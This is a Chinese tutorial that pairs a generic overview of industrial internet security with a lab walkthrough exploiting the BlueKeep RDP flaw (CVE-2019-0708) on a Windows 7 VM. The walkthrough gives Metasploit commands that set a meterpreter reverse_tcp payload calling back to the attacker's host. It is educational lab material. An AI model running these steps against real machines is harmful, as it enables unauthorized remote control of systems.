目录
二、项目:利用windows 7 cve-2019-0708漏洞
2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:
四、利用windows 7 cve-2019-0708漏洞案例
1.kali中使用nmap扫描目标机器端口确认是否开启3389端口:
8.输入:show targets,显示可以选择的靶机的架构
9.用于vm是15.5.1,所以可以选择target 3-5
一、什么是工业互联网安全,工业互联网安全问题有哪些
1.工业互联网的概念
工业互联网(Industrial Internet)是新一代信息通信技术与工业经济深度融合的新型基础设施、应用模式和工业生态,通过对人、机、物、系统等的全面连接,构建起覆盖全产业链、全价值链的全新制造和服务体系,为工业乃至产业数字化、网络化、智能化发展提供了实现途径,是第四次工业革命的重要基石。
(1).工业互联网(Industrial Internet)是全球工业系统与高级计算、分析、感应技术以及互联网连接融合的一种结果,可以通过智能机器间的连接并最终将人机连接,结合软件和大数据分析,重构全球工业、激发生产力,让世界更美好、更快速、更安全、更清洁且更经济。 而工业互联网安全就是指从构建工业互联网安全保障体系考虑,工业互联网安全应包括五大重点,即设备安全、网络安全、控制安全、应用安全和数据安全。
(2).工业互联网是实现智能制造的核心,是互联网和新一代信息技术与全球工业系统全方位深度融合集成所形成的产业和应用生态,是工业智能化发展的关键综合信息基础设施。随着工业互联网从信息时代到智能时代的转变,“信息网络支撑的互联智能”开始向“知识驱动的自主智能”发展,这个过程中的关键环节之一就是工业互联网安全。
(3).工业互联网安全:挑战与应对策略
随着工业互联网的快速发展,工业互联网安全问题日益凸显。工业互联网是工业4.0的核心,涵盖了工业生产、管理、运营等各个环节,但同时也面临着来自各方面的安全威胁。因此,如何保障工业互联网的安全,已成为当前待解决的问题。
二、项目:利用windows 7 cve-2019-0708漏洞
说明:
该漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。这意味着该漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。
三、环境准备:
1.开启Kali虚拟机和win7靶机
2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:
3.若3389没打开,可以右键计算机,选择属性
4.选择远程设置
5.选择允许远程连接
四、利用windows 7 cve-2019-0708漏洞案例
1.kali中使用nmap扫描目标机器端口确认是否开启3389端口:
nmap 192.168.11.133(win7IP)
2.确认开启后启动msfconsole
3. 搜索漏洞:
search 0708
#前两个模块,一个是扫描功能,一个是攻击功能。
4.使用攻击功能,也就是第二个模块:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
5.设置目标:
set rhost 被攻击ip #设置win7ip
set rport 3389
6.设置payload:
set payload windows/x64/meterpreter/reverse_tcp #设置64位的payload如果是32位机器则不用加x64
7.设置攻击机:
set lhost 攻击者ip #设置kali的ip
set lport 4444 #设置攻击者的监听端口(端口可以随意更改)
8.输入:show targets,显示可以选择的靶机的架构
9.用于vm是15.5.1,所以可以选择target 3-5
10.选择target 3,进行尝试:
set target 3
11.进行攻击,运行:run
12.假如可以建立连接,输入:
五、运行远程桌面模块
13.另开一个kali终端,输入:
rdesktop win7靶机IP
六、总结
工业互联网的安全问题需要贯穿整个软件工程过程中进行设计和考虑,不能到了系统最后上线或投产阶段再被动考虑安全问题。在工业互联网建设中,需要保证业务功能的安全,更要保护企业隐私数据的安全。同时关注可靠性、完整性、可用性等。安全要融入到整个软件生命周期内,将传统意识上被动安全防护转化为主动进行安全需求分析、安全设计、安全编码和安全测试。工业互联网的安全保障体系建设情况因行业信息化和自动化程度的不同而各不相同,信息化、自动化程度越高的行业,开放程度也相对较高,面临的安全风险随之增大,对安全也更加重视,安全保障体系建设相对需要更加完善。工业互联网的安全保障框架需要从以下几个方面进行考虑:网络安全、数据安全、设备安全、应用安全、人员安全等。同时,需要建立完善的安全管理体系,包括安全策略、安全组织、安全技术、安全管理等方面。